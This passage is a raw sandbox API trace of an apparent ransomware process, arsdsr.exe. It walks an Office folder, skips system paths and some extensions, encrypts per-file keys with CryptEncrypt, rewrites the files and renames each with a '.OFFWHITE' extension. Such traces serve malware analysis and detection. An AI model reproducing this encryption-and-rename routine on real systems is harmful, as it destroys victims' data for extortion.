lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" [0144.942] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpString2="PPINTL.REST.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll" [0144.942] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.942] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.942] PathFindExtensionW (pszPath="PPINTL.REST.trx_dll") returned=".trx_dll" [0144.942] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0144.942] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0144.942] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0144.942] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0144.942] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0144.942] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0144.942] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0144.942] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0144.942] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0144.942] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0144.942] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0144.942] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0144.942] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0144.942] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0144.942] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0144.942] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0144.942] GetProcessHeap () returned 0x500000 [0144.942] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52eaf0 [0144.942] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\ppintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0144.943] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=286560) returned 1 [0144.943] GetProcessHeap () returned 0x500000 [0144.943] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0144.943] GetProcessHeap () returned 0x500000 [0144.943] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0144.944] GetProcessHeap () returned 0x500000 [0144.944] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0144.944] GetProcessHeap () returned 0x500000 [0144.944] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0144.944] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.944] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.944] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0144.944] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.944] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.944] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0144.944] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.944] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.944] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x100) returned 1 [0144.944] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.944] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.944] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0144.944] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x45f60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.944] SetLastError (dwErrCode=0x0) [0144.944] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0144.946] GetLastError () returned 0x0 [0144.946] GetLastError () returned 0x0 [0144.946] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x46060, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.946] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0144.946] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x46160, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.946] WriteFile (in: hFile=0x218, lpBuffer=0x52eaf0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x52eaf0*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0144.947] GetProcessHeap () returned 0x500000 [0144.947] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x45f60) returned 0x5607c8 [0144.947] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.947] ReadFile (in: hFile=0x218, lpBuffer=0x5607c8, nNumberOfBytesToRead=0x45f60, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesRead=0x295d1c0*=0x45f60, lpOverlapped=0x0) returned 1 [0144.962] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.963] WriteFile (in: hFile=0x218, lpBuffer=0x5607c8*, nNumberOfBytesToWrite=0x45f60, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesWritten=0x295d1cc*=0x45f60, lpOverlapped=0x0) returned 1 [0144.964] GetProcessHeap () returned 0x500000 [0144.964] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5607c8 | out: hHeap=0x500000) returned 1 [0144.964] CloseHandle (hObject=0x218) returned 1 [0144.964] GetProcessHeap () returned 0x500000 [0144.964] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0144.964] GetProcessHeap () returned 0x500000 [0144.964] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0144.964] GetProcessHeap () returned 0x500000 [0144.964] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0144.964] GetProcessHeap () returned 0x500000 [0144.964] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0144.964] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll" [0144.964] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll.OFFWHITE" [0144.964] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\ppintl.rest.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\ppintl.rest.trx_dll.offwhite")) returned 1 [0144.965] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa3b09500, ftCreationTime.dwHighDateTime=0x1cac809, ftLastAccessTime.dwLowDateTime=0xef00bf70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xa3b09500, ftLastWriteTime.dwHighDateTime=0x1cac809, nFileSizeHigh=0x0, nFileSizeLow=0x1a360, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="PUB6INTL.DLL.trx_dll", cAlternateFileName="PUB6IN~1.TRX")) returned 1 [0144.965] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2=".") returned 1 [0144.965] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="..") returned 1 [0144.965] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="...") returned 1 [0144.965] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="windows") returned -1 [0144.965] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="$recycle.bin") returned 1 [0144.965] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="rsa") returned -1 [0144.966] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0144.966] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="programdata") returned 1 [0144.966] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="appdata") returned 1 [0144.966] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="program files") returned 1 [0144.966] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="program files (x86)") returned 1 [0144.966] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" [0144.966] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpString2="PUB6INTL.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll" [0144.966] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.966] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.966] PathFindExtensionW (pszPath="PUB6INTL.DLL.trx_dll") returned=".trx_dll" [0144.966] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0144.966] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0144.966] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0144.966] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0144.966] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0144.966] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0144.966] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0144.966] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0144.966] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0144.966] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0144.966] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0144.966] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0144.966] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0144.966] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0144.966] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0144.966] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0144.966] GetProcessHeap () returned 0x500000 [0144.967] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52eb00 [0144.967] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\pub6intl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0144.968] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=107360) returned 1 [0144.968] GetProcessHeap () returned 0x500000 [0144.968] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0144.968] GetProcessHeap () returned 0x500000 [0144.968] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0144.968] GetProcessHeap () returned 0x500000 [0144.968] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0144.968] GetProcessHeap () returned 0x500000 [0144.968] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0144.968] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.968] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.968] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0144.968] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.968] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.968] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0144.968] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.968] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.968] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x100) returned 1 [0144.968] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.968] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.969] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0144.969] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x1a360, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.969] SetLastError (dwErrCode=0x0) [0144.969] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0144.971] GetLastError () returned 0x0 [0144.971] GetLastError () returned 0x0 [0144.971] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x1a460, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.971] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0144.971] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x1a560, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.971] WriteFile (in: hFile=0x218, lpBuffer=0x52eb00*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x52eb00*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0144.971] GetProcessHeap () returned 0x500000 [0144.971] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1a360) returned 0x5607c8 [0144.971] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.971] ReadFile (in: hFile=0x218, lpBuffer=0x5607c8, nNumberOfBytesToRead=0x1a360, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesRead=0x295d1c0*=0x1a360, lpOverlapped=0x0) returned 1 [0144.978] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.978] WriteFile (in: hFile=0x218, lpBuffer=0x5607c8*, nNumberOfBytesToWrite=0x1a360, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesWritten=0x295d1cc*=0x1a360, lpOverlapped=0x0) returned 1 [0144.979] GetProcessHeap () returned 0x500000 [0144.979] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5607c8 | out: hHeap=0x500000) returned 1 [0144.979] CloseHandle (hObject=0x218) returned 1 [0144.979] GetProcessHeap () returned 0x500000 [0144.979] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0144.979] GetProcessHeap () returned 0x500000 [0144.979] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0144.979] GetProcessHeap () returned 0x500000 [0144.979] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0144.979] GetProcessHeap () returned 0x500000 [0144.979] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0144.979] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll" [0144.979] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll.OFFWHITE" [0144.979] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\pub6intl.dll.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\pub6intl.dll.trx_dll.offwhite")) returned 1 [0144.980] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa27f6800, ftCreationTime.dwHighDateTime=0x1cac809, ftLastAccessTime.dwLowDateTime=0xef0320d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xa27f6800, ftLastWriteTime.dwHighDateTime=0x1cac809, nFileSizeHigh=0x0, nFileSizeLow=0x8e160, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="PUB6INTL.REST.trx_dll", cAlternateFileName="PUB6IN~2.TRX")) returned 1 [0144.980] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2=".") returned 1 [0144.980] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="..") returned 1 [0144.980] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="...") returned 1 [0144.980] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="windows") returned -1 [0144.980] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="$recycle.bin") returned 1 [0144.980] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="rsa") returned -1 [0144.980] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="ntuser.dat") returned 1 [0144.980] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="programdata") returned 1 [0144.980] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="appdata") returned 1 [0144.980] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="program files") returned 1 [0144.980] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="program files (x86)") returned 1 [0144.980] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" [0144.980] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpString2="PUB6INTL.REST.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll" [0144.980] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.981] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.981] PathFindExtensionW (pszPath="PUB6INTL.REST.trx_dll") returned=".trx_dll" [0144.981] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0144.981] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0144.981] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0144.981] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0144.981] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0144.981] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0144.981] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0144.981] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0144.981] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0144.981] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0144.981] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0144.981] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0144.981] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0144.981] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0144.981] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0144.981] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0144.981] GetProcessHeap () returned 0x500000 [0144.981] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52eb10 [0144.981] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\pub6intl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0144.982] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=581984) returned 1 [0144.982] GetProcessHeap () returned 0x500000 [0144.982] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0144.982] GetProcessHeap () returned 0x500000 [0144.982] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0144.982] GetProcessHeap () returned 0x500000 [0144.982] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0144.982] GetProcessHeap () returned 0x500000 [0144.982] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0144.982] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.982] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.982] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0144.982] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.982] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.982] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0144.982] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.982] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.982] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x100) returned 1 [0144.983] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.983] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.983] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0144.983] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x8e160, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.983] SetLastError (dwErrCode=0x0) [0144.983] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, 